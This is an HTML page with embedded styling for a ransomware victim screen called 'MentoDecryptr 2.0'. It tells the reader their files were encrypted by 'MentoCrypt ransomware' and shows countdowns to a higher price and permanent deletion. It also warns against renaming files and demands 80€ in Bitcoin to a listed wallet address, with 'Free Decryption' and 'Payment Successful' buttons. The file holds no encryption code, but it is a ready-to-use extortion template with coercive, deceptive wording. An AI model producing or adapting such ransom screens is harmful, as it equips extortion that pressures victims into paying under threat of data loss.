<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MentoDecryptr 2.0</title>
    <style>
        body {
    background-color: #142c01;
    margin: 0px;
    color: #ffffff;
    font-family: bold 12px/1.5 Calibri, sans-serif;
}

.ddb {
    width: 80px;
    height: 35px;
    margin: 0px;
    margin-left: 320px;
    margin-top: -31px;
}

.ddb select{
    width: 120px;
    height: 20px;
    margin: 0px;
    margin-left: 15px;
    margin-top: 5px;
}

.frame h1 {
  margin: 0;
  width: 350px; 
  margin-left: -25px;        
}

#frame1 {
    height: 40px;
    font: bold 12px/1.5 Calibri, sans-serif;
    width: 400px;
    margin-bottom: 10px;
    margin: 2px;
    margin-left: 330px;
}

#frame2 {
    height: 128px;
    width: 128px;
    border: 1px, solid;
    margin-left: 45px;
    margin-top: -30px;
}

#frame3 {
    height: 140px;
    width: 220px;
    margin-left: 10px;
    margin-top: 20px;
    border: 1px, solid;
}

#frame3 h1 {
    font: 15px/1.5 Calibri, sans-serif;
    color: #fcf803;
    margin-left: 30px;
    margin-top: 10px;
    margin-bottom: 10px;
}

#frame3 p {
    font: 18px/1.5 E1234, sans-serif;
    color: #ffffff;
    margin-left: 30px;
    margin-top: 20px;
    margin-bottom: 10px;
}

#frame4 {
    height: 140px;
    width: 220px;
    margin-left: 10px;
    margin-top: 10px;
    border: 1px, solid;
}

#frame4 h1 {
    font: 15px/1.5 Calibri, sans-serif;
    color: #fcf803;
    margin-left: 20px;
    margin-top: 10px;
    margin-bottom: 10px;
}

#frame4 p {
    font: 18px/1.5 E1234, sans-serif;
    color: #ffffff;
    margin-left: 30px;
    margin-top: 20px;
    margin-bottom: 10px;
}

#frame5 {
    height: 380px;
    width: 560px;
    margin-left: 240px;
    margin-top: -500px;
    border: 1px, solid;
    background-color: #ffffff;
    color: black;
    padding: 2px;
    overflow: auto;
}

#frame5 h2 {
    font: bold 16px/1.5 Arial, sans-serif;
    color: black;
}

#frame5 p {
    font: 13px/1.5 Arial, sans-serif;
    color: black;
}

#frame6 {
  width: 575px;
  height: 40px;
  margin-top: 25px;
  margin-left: 228px;      
  font: bold 12px/1.5 Calibri, sans-serif;
  display: flex;
  justify-content: center; 
  align-items: center;     
  gap: 15px;               
}

#frame6 button {
  height: 30px;
  width: 275px;
  font: 14px/1.5 Calibri, sans-serif;
  cursor: pointer;
  border: none;
  margin-top: -35px;
  padding: 0;
}

#frame7 {
    height: 80px;
    width: 565px;
    margin-left: 240px;
    margin-top: 10px;
    border: 1px, solid;
}

#frame7 img{
    margin-top: -30px;
    margin-left: 10px;
}

#frame7 h1 {
    font: 15px/1.5 Calibri, sans-serif;
    width: 300px;
    color: #fcf803;
    margin-left: 205px;
    margin-top: 5px;
    margin-bottom: 10px;
}

#frame8 {
    height: 30px;
    width: 260px;
    margin-left: 205px;
    margin-top: -40px;
    margin-bottom: 5px;
    border: 1px, solid;
}

#frame8 h1{
    font: 15px/1.5 Calibri, sans-serif;
    color: #ffffff;
    margin-left: 5px;
    width: 260px;
    margin-top: 3px;
    margin-bottom: 10px;
}

#frame9 {
    height: 70px;
    width: 180px;
    margin-left: 10px;
    margin-top: 13px;
}

#frame9 a{
    font: 16px/1.5 Calibri, sans-serif;
    color: #06dbf7;
    margin-left: 15px;
    width: 260px;
    margin-top: 30px;
    margin-bottom: 10px;
}

#frame10 {
    height: 30px;
    width: 60px;
    margin-left: 470px;
    margin-top: -37px;
    margin-bottom: 5px;
    border: 1px, solid;
}

#frame10 button{
    height: 30px;
    width: 60px;
    cursor: pointer;
}

    </style>
</head>

<body>
        <div class="frame" id="frame1">
            <h1>Whoops, your files got encrypted!</h1>
            <div class="ddb">
                <select>
                    <option value="e" selected>English</option>
                </select>
            </div>
        </div>
        <div class="frame" id="frame2">
            <img src="lock.png">
        </div>
        <div class="frame" id="frame3">
            <h1>
                Decryption price will rise in
            </h1>
            <p>
                03:00:00:00
            </p>
        </div>
        <div class="frame" id="frame4">
            <h1>
                Files will be deleted forever in
            </h1>
            <p>
                06:00:00:00
            </p>
        </div>
        <div class="frame" id="frame9">
            <a href="https://en.wikipedia.org/wiki/Bitcoin">Help with Bitcoin</a><br>
            <a href="https://bitcoin.org/en/buy">Purchase Bitcoin</a><br>
            <a href="">Message Us</a>
        </div>
        <div class="frame" id="frame5">
            <h2>What just happend?</h2><p>Some of your documents, videos, photos and databases have been locked up<br> 
                by MentoCrypt ransomware. You may have tried to rename or use your files, but you are just wasting your time with those actions.<br>
                Decryption of your files is not possible without your personal ID,<br>
                that is securely being encrypted. However it is possible to restore your files<br>
                by following next steps.</p>
                
            <h2>How can I get my files back?</h2><p>If you want to use your files again, please read next part very carefully!<br>
                It is fully possible for you to use your files again, but you may run out of time! We promise,<br>
                that you can get your data decrypted safely and very easily without any spying or any<br>
                third party access. Before any transactions or payments, you can unlock some of your files for<br>
                free by pressing "Free Decryption". Then the program decrypts 4 random found files, that are<br>
                being encrypted and displays the file paths.<br>
                
            <h2>How do I pay the demand?</h2><p>Payments can be paid only with Bitcoin!<br>
                If you are new with Bitcoin, you can click "Help with Bitcoin" for information.<br>
                To decrypt your files you must to send demanded worth of<br>
                Bitcoin to address below. Then, wait few seconds and press "Payment Successful",<br> 
                and wait for the program to check from our server for your<br>
                Bitcoin transaction. Best time to check for payment is 9:00am - 4:00pm UTC<br>
                from Monday to Saturday.<br>
                If the payment was successful and you sent right amount of<br>
                Cryptocurrency, you can use your files again. If you don't pay in three days,<br>
                decryption price rises from 80€ to 150€. If you still haven't paid and it has<br>
                been six days or more, all your files and data will be destroyed forever.</p>
                
            <h2>Important to note!</h2><p>You can't decrypt your files without your ID being decrypted<br>
                by this program first!<br>
                DO NOT TRY TO RENAME YOUR FILES! IT LEADS TO PERMANENT DATA LOSS!!!<br>
                We hope, that you pay soon as possible to get your files back without paying extra.<br>
                If you have any questions or you have something to ask, press "Message Us".<br>
                There you can write your question and we will respond as quick as possible.<br>
                You can also use internet as much as you want to gather knowledge.</p>
        </div>
        <div class="frame" id="frame7">
            <h1>Send 80€ worth of Bitcoin to this address</h1>
            <img src="btc.png">
            <div class="frame" id="frame8">
                <h1>1EyreCkbbFuiVLiv7ragTbtWbGEtnnGKus</h1>
            </div>
            <div class="frame" id="frame10">
                <button class="cpy">Copy</button>
            </div>
        </div>
        <div class="frame" id="frame6">
            <br><button class="FD">Free Decryption</button><button class="PS">Payment Successful</button>
        </div>
        
</body>
</html>
